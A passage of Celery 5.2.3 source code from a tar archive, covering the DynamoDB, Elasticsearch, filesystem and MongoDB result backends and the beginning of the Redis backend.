dburi, **kwargs): engine, session = self.create_session(dburi, **kwargs) self.prepare_models(engine) return session() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/dynamodb.py0000664000175000017500000004154600000000000020113 0ustar00asifasif00000000000000"""AWS DynamoDB result store backend.""" from collections import namedtuple from time import sleep, time from kombu.utils.url import _parse_url as parse_url from celery.exceptions import ImproperlyConfigured from celery.utils.log import get_logger from .base import KeyValueStoreBackend try: import boto3 from botocore.exceptions import ClientError except ImportError: # pragma: no cover boto3 = ClientError = None __all__ = ('DynamoDBBackend',) # Helper class that describes a DynamoDB attribute DynamoDBAttribute = namedtuple('DynamoDBAttribute', ('name', 'data_type')) logger = get_logger(__name__) class DynamoDBBackend(KeyValueStoreBackend): """AWS DynamoDB result backend. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`boto3` is not available. """ #: default DynamoDB table name (`default`) table_name = 'celery' #: Read Provisioned Throughput (`default`) read_capacity_units = 1 #: Write Provisioned Throughput (`default`) write_capacity_units = 1 #: AWS region (`default`) aws_region = None #: The endpoint URL that is passed to boto3 (local DynamoDB) (`default`) endpoint_url = None #: Item time-to-live in seconds (`default`) time_to_live_seconds = None # DynamoDB supports Time to Live as an auto-expiry mechanism. 
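# Illustrative note added by the editor (not part of the original source):
# TTL is controlled via the ``ttl_seconds`` query parameter of the backend
# URL parsed in __init__ below, e.g. (hypothetical values):
#   result_backend = 'dynamodb://localhost:8000/celery?ttl_seconds=3600'
#   result_backend = 'dynamodb://access_key:secret_key@us-east-1/celery?read=5&write=5'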
supports_autoexpire = True _key_field = DynamoDBAttribute(name='id', data_type='S') _value_field = DynamoDBAttribute(name='result', data_type='B') _timestamp_field = DynamoDBAttribute(name='timestamp', data_type='N') _ttl_field = DynamoDBAttribute(name='ttl', data_type='N') _available_fields = None def __init__(self, url=None, table_name=None, *args, **kwargs): super().__init__(*args, **kwargs) self.url = url self.table_name = table_name or self.table_name if not boto3: raise ImproperlyConfigured( 'You need to install the boto3 library to use the ' 'DynamoDB backend.') aws_credentials_given = False aws_access_key_id = None aws_secret_access_key = None if url is not None: scheme, region, port, username, password, table, query = \ parse_url(url) aws_access_key_id = username aws_secret_access_key = password access_key_given = aws_access_key_id is not None secret_key_given = aws_secret_access_key is not None if access_key_given != secret_key_given: raise ImproperlyConfigured( 'You need to specify both the Access Key ID ' 'and Secret.') aws_credentials_given = access_key_given if region == 'localhost': # We are using the downloadable, local version of DynamoDB self.endpoint_url = f'http://localhost:{port}' self.aws_region = 'us-east-1' logger.warning( 'Using local-only DynamoDB endpoint URL: {}'.format( self.endpoint_url ) ) else: self.aws_region = region # If endpoint_url is explicitly set use it instead _get = self.app.conf.get config_endpoint_url = _get('dynamodb_endpoint_url') if config_endpoint_url: self.endpoint_url = config_endpoint_url self.read_capacity_units = int( query.get( 'read', self.read_capacity_units ) ) self.write_capacity_units = int( query.get( 'write', self.write_capacity_units ) ) ttl = query.get('ttl_seconds', self.time_to_live_seconds) if ttl: try: self.time_to_live_seconds = int(ttl) except ValueError as e: logger.error( 'TTL must be a number; got "{ttl}"', exc_info=e ) raise e self.table_name = table or self.table_name self._available_fields = ( self._key_field, self._value_field, self._timestamp_field ) self._client = None if aws_credentials_given: self._get_client( access_key_id=aws_access_key_id, secret_access_key=aws_secret_access_key ) def _get_client(self, access_key_id=None, secret_access_key=None): """Get client connection.""" if self._client is None: client_parameters = { 'region_name': self.aws_region } if access_key_id is not None: client_parameters.update({ 'aws_access_key_id': access_key_id, 'aws_secret_access_key': secret_access_key }) if self.endpoint_url is not None: client_parameters['endpoint_url'] = self.endpoint_url self._client = boto3.client( 'dynamodb', **client_parameters ) self._get_or_create_table() if self._has_ttl() is not None: self._validate_ttl_methods() self._set_table_ttl() return self._client def _get_table_schema(self): """Get the boto3 structure describing the DynamoDB table schema.""" return { 'AttributeDefinitions': [ { 'AttributeName': self._key_field.name, 'AttributeType': self._key_field.data_type } ], 'TableName': self.table_name, 'KeySchema': [ { 'AttributeName': self._key_field.name, 'KeyType': 'HASH' } ], 'ProvisionedThroughput': { 'ReadCapacityUnits': self.read_capacity_units, 'WriteCapacityUnits': self.write_capacity_units } } def _get_or_create_table(self): """Create table if not exists, otherwise return the description.""" table_schema = self._get_table_schema() try: table_description = self._client.create_table(**table_schema) logger.info( 'DynamoDB Table {} did not exist, creating.'.format( self.table_name ) ) # In 
case we created the table, wait until it becomes available. self._wait_for_table_status('ACTIVE') logger.info( 'DynamoDB Table {} is now available.'.format( self.table_name ) ) return table_description except ClientError as e: error_code = e.response['Error'].get('Code', 'Unknown') # If table exists, do not fail, just return the description. if error_code == 'ResourceInUseException': return self._client.describe_table( TableName=self.table_name ) else: raise e def _has_ttl(self): """Return the desired Time to Live config. - True: Enable TTL on the table; use expiry. - False: Disable TTL on the table; don't use expiry. - None: Ignore TTL on the table; don't use expiry. """ return None if self.time_to_live_seconds is None \ else self.time_to_live_seconds >= 0 def _validate_ttl_methods(self): """Verify boto support for the DynamoDB Time to Live methods.""" # Required TTL methods. required_methods = ( 'update_time_to_live', 'describe_time_to_live', ) # Find missing methods. missing_methods = [] for method in list(required_methods): if not hasattr(self._client, method): missing_methods.append(method) if missing_methods: logger.error( ( 'boto3 method(s) {methods} not found; ensure that ' 'boto3>=1.9.178 and botocore>=1.12.178 are installed' ).format( methods=','.join(missing_methods) ) ) raise AttributeError( 'boto3 method(s) {methods} not found'.format( methods=','.join(missing_methods) ) ) def _get_ttl_specification(self, ttl_attr_name): """Get the boto3 structure describing the DynamoDB TTL specification.""" return { 'TableName': self.table_name, 'TimeToLiveSpecification': { 'Enabled': self._has_ttl(), 'AttributeName': ttl_attr_name } } def _get_table_ttl_description(self): # Get the current TTL description. try: description = self._client.describe_time_to_live( TableName=self.table_name ) except ClientError as e: error_code = e.response['Error'].get('Code', 'Unknown') error_message = e.response['Error'].get('Message', 'Unknown') logger.error(( 'Error describing Time to Live on DynamoDB table {table}: ' '{code}: {message}' ).format( table=self.table_name, code=error_code, message=error_message, )) raise e return description def _set_table_ttl(self): """Enable or disable Time to Live on the table.""" # Get the table TTL description, and return early when possible. description = self._get_table_ttl_description() status = description['TimeToLiveDescription']['TimeToLiveStatus'] if status in ('ENABLED', 'ENABLING'): cur_attr_name = \ description['TimeToLiveDescription']['AttributeName'] if self._has_ttl(): if cur_attr_name == self._ttl_field.name: # We want TTL enabled, and it is currently enabled or being # enabled, and on the correct attribute. logger.debug(( 'DynamoDB Time to Live is {situation} ' 'on table {table}' ).format( situation='already enabled' if status == 'ENABLED' else 'currently being enabled', table=self.table_name )) return description elif status in ('DISABLED', 'DISABLING'): if not self._has_ttl(): # We want TTL disabled, and it is currently disabled or being # disabled. logger.debug(( 'DynamoDB Time to Live is {situation} ' 'on table {table}' ).format( situation='already disabled' if status == 'DISABLED' else 'currently being disabled', table=self.table_name )) return description # The state shouldn't ever have any value beyond the four handled # above, but to ease troubleshooting of potential future changes, emit # a log showing the unknown state. else: # pragma: no cover logger.warning(( 'Unknown DynamoDB Time to Live status {status} ' 'on table {table}. 
Attempting to continue.' ).format( status=status, table=self.table_name )) # At this point, we have one of the following situations: # # We want TTL enabled, # # - and it's currently disabled: Try to enable. # # - and it's being disabled: Try to enable, but this is almost sure to # raise ValidationException with message: # # Time to live has been modified multiple times within a fixed # interval # # - and it's currently enabling or being enabled, but on the wrong # attribute: Try to enable, but this will raise ValidationException # with message: # # TimeToLive is active on a different AttributeName: current # AttributeName is ttlx # # We want TTL disabled, # # - and it's currently enabled: Try to disable. # # - and it's being enabled: Try to disable, but this is almost sure to # raise ValidationException with message: # # Time to live has been modified multiple times within a fixed # interval # attr_name = \ cur_attr_name if status == 'ENABLED' else self._ttl_field.name try: specification = self._client.update_time_to_live( **self._get_ttl_specification( ttl_attr_name=attr_name ) ) logger.info( ( 'DynamoDB table Time to Live updated: ' 'table={table} enabled={enabled} attribute={attr}' ).format( table=self.table_name, enabled=self._has_ttl(), attr=self._ttl_field.name ) ) return specification except ClientError as e: error_code = e.response['Error'].get('Code', 'Unknown') error_message = e.response['Error'].get('Message', 'Unknown') logger.error(( 'Error {action} Time to Live on DynamoDB table {table}: ' '{code}: {message}' ).format( action='enabling' if self._has_ttl() else 'disabling', table=self.table_name, code=error_code, message=error_message, )) raise e def _wait_for_table_status(self, expected='ACTIVE'): """Poll for the expected table status.""" achieved_state = False while not achieved_state: table_description = self.client.describe_table( TableName=self.table_name ) logger.debug( 'Waiting for DynamoDB table {} to become {}.'.format( self.table_name, expected ) ) current_status = table_description['Table']['TableStatus'] achieved_state = current_status == expected sleep(1) def _prepare_get_request(self, key): """Construct the item retrieval request parameters.""" return { 'TableName': self.table_name, 'Key': { self._key_field.name: { self._key_field.data_type: key } } } def _prepare_put_request(self, key, value): """Construct the item creation request parameters.""" timestamp = time() put_request = { 'TableName': self.table_name, 'Item': { self._key_field.name: { self._key_field.data_type: key }, self._value_field.name: { self._value_field.data_type: value }, self._timestamp_field.name: { self._timestamp_field.data_type: str(timestamp) } } } if self._has_ttl(): put_request['Item'].update({ self._ttl_field.name: { self._ttl_field.data_type: str(int(timestamp + self.time_to_live_seconds)) } }) return put_request def _item_to_dict(self, raw_response): """Convert get_item() response to field-value pairs.""" if 'Item' not in raw_response: return {} return { field.name: raw_response['Item'][field.name][field.data_type] for field in self._available_fields } @property def client(self): return self._get_client() def get(self, key): key = str(key) request_parameters = self._prepare_get_request(key) item_response = self.client.get_item(**request_parameters) item = self._item_to_dict(item_response) return item.get(self._value_field.name) def set(self, key, value): key = str(key) request_parameters = self._prepare_put_request(key, value) self.client.put_item(**request_parameters) def 
mget(self, keys): return [self.get(key) for key in keys] def delete(self, key): key = str(key) request_parameters = self._prepare_get_request(key) self.client.delete_item(**request_parameters) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/elasticsearch.py0000664000175000017500000002022300000000000021115 0ustar00asifasif00000000000000"""Elasticsearch result store backend.""" from datetime import datetime from kombu.utils.encoding import bytes_to_str from kombu.utils.url import _parse_url from celery import states from celery.exceptions import ImproperlyConfigured from .base import KeyValueStoreBackend try: import elasticsearch except ImportError: # pragma: no cover elasticsearch = None __all__ = ('ElasticsearchBackend',) E_LIB_MISSING = """\ You need to install the elasticsearch library to use the Elasticsearch \ result backend.\ """ class ElasticsearchBackend(KeyValueStoreBackend): """Elasticsearch Backend. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`elasticsearch` is not available. """ index = 'celery' doc_type = 'backend' scheme = 'http' host = 'localhost' port = 9200 username = None password = None es_retry_on_timeout = False es_timeout = 10 es_max_retries = 3 def __init__(self, url=None, *args, **kwargs): super().__init__(*args, **kwargs) self.url = url _get = self.app.conf.get if elasticsearch is None: raise ImproperlyConfigured(E_LIB_MISSING) index = doc_type = scheme = host = port = username = password = None if url: scheme, host, port, username, password, path, _ = _parse_url(url) if scheme == 'elasticsearch': scheme = None if path: path = path.strip('/') index, _, doc_type = path.partition('/') self.index = index or self.index self.doc_type = doc_type or self.doc_type self.scheme = scheme or self.scheme self.host = host or self.host self.port = port or self.port self.username = username or self.username self.password = password or self.password self.es_retry_on_timeout = ( _get('elasticsearch_retry_on_timeout') or self.es_retry_on_timeout ) es_timeout = _get('elasticsearch_timeout') if es_timeout is not None: self.es_timeout = es_timeout es_max_retries = _get('elasticsearch_max_retries') if es_max_retries is not None: self.es_max_retries = es_max_retries self.es_save_meta_as_text = _get('elasticsearch_save_meta_as_text', True) self._server = None def exception_safe_to_retry(self, exc): if isinstance(exc, (elasticsearch.exceptions.TransportError)): # 401: Unauthorized # 409: Conflict # 429: Too Many Requests # 500: Internal Server Error # 502: Bad Gateway # 503: Service Unavailable # 504: Gateway Timeout # N/A: Low level exception (i.e. 
socket exception) if exc.status_code in {401, 409, 429, 500, 502, 503, 504, 'N/A'}: return True return False def get(self, key): try: res = self._get(key) try: if res['found']: return res['_source']['result'] except (TypeError, KeyError): pass except elasticsearch.exceptions.NotFoundError: pass def _get(self, key): return self.server.get( index=self.index, doc_type=self.doc_type, id=key, ) def _set_with_state(self, key, value, state): body = { 'result': value, '@timestamp': '{}Z'.format( datetime.utcnow().isoformat()[:-3] ), } try: self._index( id=key, body=body, ) except elasticsearch.exceptions.ConflictError: # document already exists, update it self._update(key, body, state) def set(self, key, value): return self._set_with_state(key, value, None) def _index(self, id, body, **kwargs): body = {bytes_to_str(k): v for k, v in body.items()} return self.server.index( id=bytes_to_str(id), index=self.index, doc_type=self.doc_type, body=body, params={'op_type': 'create'}, **kwargs ) def _update(self, id, body, state, **kwargs): """Update state in a conflict free manner. If state is defined (not None), this will not update ES server if either: * existing state is success * existing state is a ready state and current state in not a ready state This way, a Retry state cannot override a Success or Failure, and chord_unlock will not retry indefinitely. """ body = {bytes_to_str(k): v for k, v in body.items()} try: res_get = self._get(key=id) if not res_get.get('found'): return self._index(id, body, **kwargs) # document disappeared between index and get calls. except elasticsearch.exceptions.NotFoundError: return self._index(id, body, **kwargs) try: meta_present_on_backend = self.decode_result(res_get['_source']['result']) except (TypeError, KeyError): pass else: if meta_present_on_backend['status'] == states.SUCCESS: # if stored state is already in success, do nothing return {'result': 'noop'} elif meta_present_on_backend['status'] in states.READY_STATES and state in states.UNREADY_STATES: # if stored state is in ready state and current not, do nothing return {'result': 'noop'} # get current sequence number and primary term # https://www.elastic.co/guide/en/elasticsearch/reference/current/optimistic-concurrency-control.html seq_no = res_get.get('_seq_no', 1) prim_term = res_get.get('_primary_term', 1) # try to update document with current seq_no and primary_term res = self.server.update( id=bytes_to_str(id), index=self.index, doc_type=self.doc_type, body={'doc': body}, params={'if_primary_term': prim_term, 'if_seq_no': seq_no}, **kwargs ) # result is elastic search update query result # noop = query did not update any document # updated = at least one document got updated if res['result'] == 'noop': raise elasticsearch.exceptions.ConflictError(409, 'conflicting update occurred concurrently', {}) return res def encode(self, data): if self.es_save_meta_as_text: return super().encode(data) else: if not isinstance(data, dict): return super().encode(data) if data.get("result"): data["result"] = self._encode(data["result"])[2] if data.get("traceback"): data["traceback"] = self._encode(data["traceback"])[2] return data def decode(self, payload): if self.es_save_meta_as_text: return super().decode(payload) else: if not isinstance(payload, dict): return super().decode(payload) if payload.get("result"): payload["result"] = super().decode(payload["result"]) if payload.get("traceback"): payload["traceback"] = super().decode(payload["traceback"]) return payload def mget(self, keys): return [self.get(key) for key 
in keys] def delete(self, key): self.server.delete(index=self.index, doc_type=self.doc_type, id=key) def _get_server(self): """Connect to the Elasticsearch server.""" http_auth = None if self.username and self.password: http_auth = (self.username, self.password) return elasticsearch.Elasticsearch( f'{self.host}:{self.port}', retry_on_timeout=self.es_retry_on_timeout, max_retries=self.es_max_retries, timeout=self.es_timeout, scheme=self.scheme, http_auth=http_auth, ) @property def server(self): if self._server is None: self._server = self._get_server() return self._server ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/filesystem.py0000664000175000017500000000726200000000000020477 0ustar00asifasif00000000000000"""File-system result store backend.""" import locale import os from datetime import datetime from kombu.utils.encoding import ensure_bytes from celery import uuid from celery.backends.base import KeyValueStoreBackend from celery.exceptions import ImproperlyConfigured default_encoding = locale.getpreferredencoding(False) E_NO_PATH_SET = 'You need to configure a path for the file-system backend' E_PATH_NON_CONFORMING_SCHEME = ( 'A path for the file-system backend should conform to the file URI scheme' ) E_PATH_INVALID = """\ The configured path for the file-system backend does not work correctly, please make sure that it exists and has the correct permissions.\ """ class FilesystemBackend(KeyValueStoreBackend): """File-system result backend. Arguments: url (str): URL to the directory we should use open (Callable): open function to use when opening files unlink (Callable): unlink function to use when deleting files sep (str): directory separator (to join the directory with the key) encoding (str): encoding used on the file-system """ def __init__(self, url=None, open=open, unlink=os.unlink, sep=os.sep, encoding=default_encoding, *args, **kwargs): super().__init__(*args, **kwargs) self.url = url path = self._find_path(url) # Remove forwarding "/" for Windows os if os.name == "nt" and path.startswith("/"): path = path[1:] # We need the path and separator as bytes objects self.path = path.encode(encoding) self.sep = sep.encode(encoding) self.open = open self.unlink = unlink # Lets verify that we've everything setup right self._do_directory_test(b'.fs-backend-' + uuid().encode(encoding)) def __reduce__(self, args=(), kwargs={}): kwargs.update( dict(url=self.url)) return super().__reduce__(args, kwargs) def _find_path(self, url): if not url: raise ImproperlyConfigured(E_NO_PATH_SET) if url.startswith('file://localhost/'): return url[16:] if url.startswith('file://'): return url[7:] raise ImproperlyConfigured(E_PATH_NON_CONFORMING_SCHEME) def _do_directory_test(self, key): try: self.set(key, b'test value') assert self.get(key) == b'test value' self.delete(key) except OSError: raise ImproperlyConfigured(E_PATH_INVALID) def _filename(self, key): return self.sep.join((self.path, key)) def get(self, key): try: with self.open(self._filename(key), 'rb') as infile: return infile.read() except FileNotFoundError: pass def set(self, key, value): with self.open(self._filename(key), 'wb') as outfile: outfile.write(ensure_bytes(value)) def mget(self, keys): for key in keys: yield self.get(key) def delete(self, key): self.unlink(self._filename(key)) def cleanup(self): """Delete expired meta-data.""" if not self.expires: return epoch = datetime(1970, 1, 1, tzinfo=self.app.timezone) now_ts = (self.app.now() - 
epoch).total_seconds() cutoff_ts = now_ts - self.expires for filename in os.listdir(self.path): for prefix in (self.task_keyprefix, self.group_keyprefix, self.chord_keyprefix): if filename.startswith(prefix): path = os.path.join(self.path, filename) if os.stat(path).st_mtime < cutoff_ts: self.unlink(path) break ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/celery/backends/mongodb.py0000664000175000017500000002474500000000000017745 0ustar00asifasif00000000000000"""MongoDB result store backend.""" from datetime import datetime, timedelta from kombu.exceptions import EncodeError from kombu.utils.objects import cached_property from kombu.utils.url import maybe_sanitize_url, urlparse from celery import states from celery.exceptions import ImproperlyConfigured from .base import BaseBackend try: import pymongo except ImportError: # pragma: no cover pymongo = None if pymongo: try: from bson.binary import Binary except ImportError: # pragma: no cover from pymongo.binary import Binary from pymongo.errors import InvalidDocument else: # pragma: no cover Binary = None class InvalidDocument(Exception): pass __all__ = ('MongoBackend',) BINARY_CODECS = frozenset(['pickle', 'msgpack']) class MongoBackend(BaseBackend): """MongoDB result backend. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`pymongo` is not available. """ mongo_host = None host = 'localhost' port = 27017 user = None password = None database_name = 'celery' taskmeta_collection = 'celery_taskmeta' groupmeta_collection = 'celery_groupmeta' max_pool_size = 10 options = None supports_autoexpire = False _connection = None def __init__(self, app=None, **kwargs): self.options = {} super().__init__(app, **kwargs) if not pymongo: raise ImproperlyConfigured( 'You need to install the pymongo library to use the ' 'MongoDB backend.') # Set option defaults for key, value in self._prepare_client_options().items(): self.options.setdefault(key, value) # update conf with mongo uri data, only if uri was given if self.url: self.url = self._ensure_mongodb_uri_compliance(self.url) uri_data = pymongo.uri_parser.parse_uri(self.url) # build the hosts list to create a mongo connection hostslist = [ f'{x[0]}:{x[1]}' for x in uri_data['nodelist'] ] self.user = uri_data['username'] self.password = uri_data['password'] self.mongo_host = hostslist if uri_data['database']: # if no database is provided in the uri, use default self.database_name = uri_data['database'] self.options.update(uri_data['options']) # update conf with specific settings config = self.app.conf.get('mongodb_backend_settings') if config is not None: if not isinstance(config, dict): raise ImproperlyConfigured( 'MongoDB backend settings should be grouped in a dict') config = dict(config) # don't modify original if 'host' in config or 'port' in config: # these should take over uri conf self.mongo_host = None self.host = config.pop('host', self.host) self.port = config.pop('port', self.port) self.mongo_host = config.pop('mongo_host', self.mongo_host) self.user = config.pop('user', self.user) self.password = config.pop('password', self.password) self.database_name = config.pop('database', self.database_name) self.taskmeta_collection = config.pop( 'taskmeta_collection', self.taskmeta_collection, ) self.groupmeta_collection = config.pop( 'groupmeta_collection', self.groupmeta_collection, ) self.options.update(config.pop('options', {})) self.options.update(config) @staticmethod def _ensure_mongodb_uri_compliance(url): 
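# Note added by the editor (not part of the original source): this helper
# normalises the configured URL so PyMongo's URI parser accepts it; e.g.
# (hypothetical values) 'srv://user:pass@cluster.example.com/celery' becomes
# 'mongodb+srv://user:pass@cluster.example.com/celery', and a bare
# 'mongodb://' becomes 'mongodb://localhost'.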
parsed_url = urlparse(url) if not parsed_url.scheme.startswith('mongodb'): url = f'mongodb+{url}' if url == 'mongodb://': url += 'localhost' return url def _prepare_client_options(self): if pymongo.version_tuple >= (3,): return {'maxPoolSize': self.max_pool_size} else: # pragma: no cover return {'max_pool_size': self.max_pool_size, 'auto_start_request': False} def _get_connection(self): """Connect to the MongoDB server.""" if self._connection is None: from pymongo import MongoClient host = self.mongo_host if not host: # The first pymongo.Connection() argument (host) can be # a list of ['host:port'] elements or a mongodb connection # URI. If this is the case, don't use self.port # but let pymongo get the port(s) from the URI instead. # This enables the use of replica sets and sharding. # See pymongo.Connection() for more info. host = self.host if isinstance(host, str) \ and not host.startswith('mongodb://'): host = f'mongodb://{host}:{self.port}' # don't change self.options conf = dict(self.options) conf['host'] = host if self.user: conf['username'] = self.user if self.password: conf['password'] = self.password self._connection = MongoClient(**conf) return self._connection def encode(self, data): if self.serializer == 'bson': # mongodb handles serialization return data payload = super().encode(data) # serializer which are in a unsupported format (pickle/binary) if self.serializer in BINARY_CODECS: payload = Binary(payload) return payload def decode(self, data): if self.serializer == 'bson': return data return super().decode(data) def _store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): """Store return value and state of an executed task.""" meta = self._get_result_meta(result=self.encode(result), state=state, traceback=traceback, request=request) # Add the _id for mongodb meta['_id'] = task_id try: self.collection.replace_one({'_id': task_id}, meta, upsert=True) except InvalidDocument as exc: raise EncodeError(exc) return result def _get_task_meta_for(self, task_id): """Get task meta-data for a task by id.""" obj = self.collection.find_one({'_id': task_id}) if obj: return self.meta_from_decoded({ 'task_id': obj['_id'], 'status': obj['status'], 'result': self.decode(obj['result']), 'date_done': obj['date_done'], 'traceback': obj['traceback'], 'children': obj['children'], }) return {'status': states.PENDING, 'result': None} def _save_group(self, group_id, result): """Save the group result.""" meta = { '_id': group_id, 'result': self.encode([i.id for i in result]), 'date_done': datetime.utcnow(), } self.group_collection.replace_one({'_id': group_id}, meta, upsert=True) return result def _restore_group(self, group_id): """Get the result for a group by id.""" obj = self.group_collection.find_one({'_id': group_id}) if obj: return { 'task_id': obj['_id'], 'date_done': obj['date_done'], 'result': [ self.app.AsyncResult(task) for task in self.decode(obj['result']) ], } def _delete_group(self, group_id): """Delete a group by id.""" self.group_collection.delete_one({'_id': group_id}) def _forget(self, task_id): """Remove result from MongoDB. Raises: pymongo.exceptions.OperationsError: if the task_id could not be removed. """ # By using safe=True, this will wait until it receives a response from # the server. Likewise, it will raise an OperationsError if the # response was unable to be completed. 
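# Note added by the editor (not part of the original source): ``safe=True``
# is legacy PyMongo terminology; the delete_one() call below is acknowledged
# according to the collection's write concern (acknowledged by default),
# which serves the same purpose.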
self.collection.delete_one({'_id': task_id}) def cleanup(self): """Delete expired meta-data.""" if not self.expires: return self.collection.delete_many( {'date_done': {'$lt': self.app.now() - self.expires_delta}}, ) self.group_collection.delete_many( {'date_done': {'$lt': self.app.now() - self.expires_delta}}, ) def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs return super().__reduce__( args, dict(kwargs, expires=self.expires, url=self.url)) def _get_database(self): conn = self._get_connection() return conn[self.database_name] @cached_property def database(self): """Get database from MongoDB connection. performs authentication if necessary. """ return self._get_database() @cached_property def collection(self): """Get the meta-data task collection.""" collection = self.database[self.taskmeta_collection] # Ensure an index on date_done is there, if not process the index # in the background. Once completed cleanup will be much faster collection.create_index('date_done', background=True) return collection @cached_property def group_collection(self): """Get the meta-data task collection.""" collection = self.database[self.groupmeta_collection] # Ensure an index on date_done is there, if not process the index # in the background. Once completed cleanup will be much faster collection.create_index('date_done', background=True) return collection @cached_property def expires_delta(self): return timedelta(seconds=self.expires) def as_uri(self, include_password=False): """Return the backend as an URI. Arguments: include_password (bool): Password censored if disabled. """ if not self.url: return 'mongodb://' if include_password: return self.url if ',' not in self.url: return maybe_sanitize_url(self.url) uri1, remainder = self.url.split(',', 1) return ','.join([maybe_sanitize_url(uri1), remainder]) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/backends/redis.py0000664000175000017500000006242700000000000017425 0ustar00asifasif00000000000000"""Redis result store backend.""" import time from contextlib import contextmanager from functools import partial from ssl import CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED from urllib.parse import unquote from kombu.utils.functional import retry_over_time from kombu.utils.objects import cached_property from kombu.utils.url import _parse_url, maybe_sanitize_url from celery import states from celery._state import task_join_will_block from celery.canvas import maybe_signature from celery.exceptions import (BackendStoreError, ChordError, ImproperlyConfigured) from celery.result import GroupResult, allow_join_result from celery.utils.functional import _regen, dictfilter from celery.utils.log import get_logger from celery.utils.time import humanize_seconds from .asynchronous import AsyncBackendMixin, BaseResultConsumer from .base import BaseKeyValueStoreBackend try: import redis.connection from kombu.transport.redis import get_redis_error_classes except ImportError: # pragma: no cover redis = None get_redis_error_classes = None try: import redis.sentinel except ImportError: pass __all__ = ('RedisBackend', 'SentinelBackend') E_REDIS_MISSING = """ You need to install the redis library in order to use \ the Redis result store backend. """ E_REDIS_SENTINEL_MISSING = """ You need to install the redis library with support of \ sentinel in order to use the Redis result store backend. 
""" W_REDIS_SSL_CERT_OPTIONAL = """ Setting ssl_cert_reqs=CERT_OPTIONAL when connecting to redis means that \ celery might not validate the identity of the redis broker when connecting. \ This leaves you vulnerable to man in the middle attacks. """ W_REDIS_SSL_CERT_NONE = """ Setting ssl_cert_reqs=CERT_NONE when connecting to redis means that celery \ will not validate the identity of the redis broker when connecting. This \ leaves you vulnerable to man in the middle attacks. """ E_REDIS_SSL_PARAMS_AND_SCHEME_MISMATCH = """ SSL connection parameters have been provided but the specified URL scheme \ is redis://. A Redis SSL connection URL should use the scheme rediss://. """ E_REDIS_SSL_CERT_REQS_MISSING_INVALID = """ A rediss:// URL must have parameter ssl_cert_reqs and this must be set to \ CERT_REQUIRED, CERT_OPTIONAL, or CERT_NONE """ E_LOST = 'Connection to Redis lost: Retry (%s/%s) %s.' E_RETRY_LIMIT_EXCEEDED = """ Retry limit exceeded while trying to reconnect to the Celery redis result \ store backend. The Celery application must be restarted. """ logger = get_logger(__name__) class ResultConsumer(BaseResultConsumer): _pubsub = None def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._get_key_for_task = self.backend.get_key_for_task self._decode_result = self.backend.decode_result self._ensure = self.backend.ensure self._connection_errors = self.backend.connection_errors self.subscribed_to = set() def on_after_fork(self): try: self.backend.client.connection_pool.reset() if self._pubsub is not None: self._pubsub.close() except KeyError as e: logger.warning(str(e)) super().on_after_fork() def _reconnect_pubsub(self): self._pubsub = None self.backend.client.connection_pool.reset() # task state might have changed when the connection was down so we # retrieve meta for all subscribed tasks before going into pubsub mode metas = self.backend.client.mget(self.subscribed_to) metas = [meta for meta in metas if meta] for meta in metas: self.on_state_change(self._decode_result(meta), None) self._pubsub = self.backend.client.pubsub( ignore_subscribe_messages=True, ) if self.subscribed_to: self._pubsub.subscribe(*self.subscribed_to) @contextmanager def reconnect_on_error(self): try: yield except self._connection_errors: try: self._ensure(self._reconnect_pubsub, ()) except self._connection_errors: logger.critical(E_RETRY_LIMIT_EXCEEDED) raise def _maybe_cancel_ready_task(self, meta): if meta['status'] in states.READY_STATES: self.cancel_for(meta['task_id']) def on_state_change(self, meta, message): super().on_state_change(meta, message) self._maybe_cancel_ready_task(meta) def start(self, initial_task_id, **kwargs): self._pubsub = self.backend.client.pubsub( ignore_subscribe_messages=True, ) self._consume_from(initial_task_id) def on_wait_for_pending(self, result, **kwargs): for meta in result._iter_meta(**kwargs): if meta is not None: self.on_state_change(meta, None) def stop(self): if self._pubsub is not None: self._pubsub.close() def drain_events(self, timeout=None): if self._pubsub: with self.reconnect_on_error(): message = self._pubsub.get_message(timeout=timeout) if message and message['type'] == 'message': self.on_state_change(self._decode_result(message['data']), message) elif timeout: time.sleep(timeout) def consume_from(self, task_id): if self._pubsub is None: return self.start(task_id) self._consume_from(task_id) def _consume_from(self, task_id): key = self._get_key_for_task(task_id) if key not in self.subscribed_to: self.subscribed_to.add(key) with 
self.reconnect_on_error(): self._pubsub.subscribe(key) def cancel_for(self, task_id): key = self._get_key_for_task(task_id) self.subscribed_to.discard(key) if self._pubsub: with self.reconnect_on_error(): self._pubsub.unsubscribe(key) class RedisBackend(BaseKeyValueStoreBackend, AsyncBackendMixin): """Redis task result store. It makes use of the following commands: GET, MGET, DEL, INCRBY, EXPIRE, SET, SETEX """ ResultConsumer = ResultConsumer #: :pypi:`redis` client module. redis = redis connection_class_ssl = redis.SSLConnection if redis else None #: Maximum number of connections in the pool. max_connections = None supports_autoexpire = True supports_native_join = True #: Maximal length of string value in Redis. #: 512 MB - https://redis.io/topics/data-types _MAX_STR_VALUE_SIZE = 536870912 def __init__(self, host=None, port=None, db=None, password=None, max_connections=None, url=None, connection_pool=None, **kwargs): super().__init__(expires_type=int, **kwargs) _get = self.app.conf.get if self.redis is None: raise ImproperlyConfigured(E_REDIS_MISSING.strip()) if host and '://' in host: url, host = host, None self.max_connections = ( max_connections or _get('redis_max_connections') or self.max_connections) self._ConnectionPool = connection_pool socket_timeout = _get('redis_socket_timeout') socket_connect_timeout = _get('redis_socket_connect_timeout') retry_on_timeout = _get('redis_retry_on_timeout') socket_keepalive = _get('redis_socket_keepalive') health_check_interval = _get('redis_backend_health_check_interval') self.connparams = { 'host': _get('redis_host') or 'localhost', 'port': _get('redis_port') or 6379, 'db': _get('redis_db') or 0, 'password': _get('redis_password'), 